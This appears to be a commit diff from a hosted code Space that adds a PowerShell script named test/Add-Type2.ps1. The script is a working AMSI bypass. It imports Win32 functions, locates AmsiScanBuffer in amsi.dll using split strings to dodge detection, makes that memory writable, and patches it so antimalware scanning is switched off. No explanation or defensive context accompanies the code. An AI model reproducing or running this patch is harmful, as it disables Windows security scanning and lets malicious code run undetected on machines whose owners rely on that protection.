Spaces:
Runtime error
Runtime error
Update test/Add-Type2.ps1
Browse files- test/Add-Type2.ps1 +41 -1
test/Add-Type2.ps1
CHANGED
|
@@ -1 +1,41 @@
|
|
| 1 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
$Win32 = @"
|
| 2 |
+
|
| 3 |
+
using System;
|
| 4 |
+
using System.Runtime.InteropServices;
|
| 5 |
+
|
| 6 |
+
public class Win32 {
|
| 7 |
+
|
| 8 |
+
[DllImport("kernel32")]
|
| 9 |
+
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
|
| 10 |
+
|
| 11 |
+
[DllImport("kernel32")]
|
| 12 |
+
public static extern IntPtr LoadLibrary(string name);
|
| 13 |
+
|
| 14 |
+
[DllImport("kernel32")]
|
| 15 |
+
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
|
| 16 |
+
|
| 17 |
+
}
|
| 18 |
+
"@
|
| 19 |
+
|
| 20 |
+
Add-Type $Win32
|
| 21 |
+
|
| 22 |
+
$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
|
| 23 |
+
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
|
| 24 |
+
$p = 0
|
| 25 |
+
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
|
| 26 |
+
|
| 27 |
+
$namespace = [System.Runtime.InteropServices.Marshal]
|
| 28 |
+
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
|
| 29 |
+
|
| 30 |
+
$method = 'Copy'
|
| 31 |
+
|
| 32 |
+
$source = ${Patch}
|
| 33 |
+
|
| 34 |
+
$startIndex = 0
|
| 35 |
+
|
| 36 |
+
$destination = ${address}
|
| 37 |
+
|
| 38 |
+
$length = 6
|
| 39 |
+
|
| 40 |
+
|
| 41 |
+
$namespace::$method($source, $startIndex, $destination, $length)
|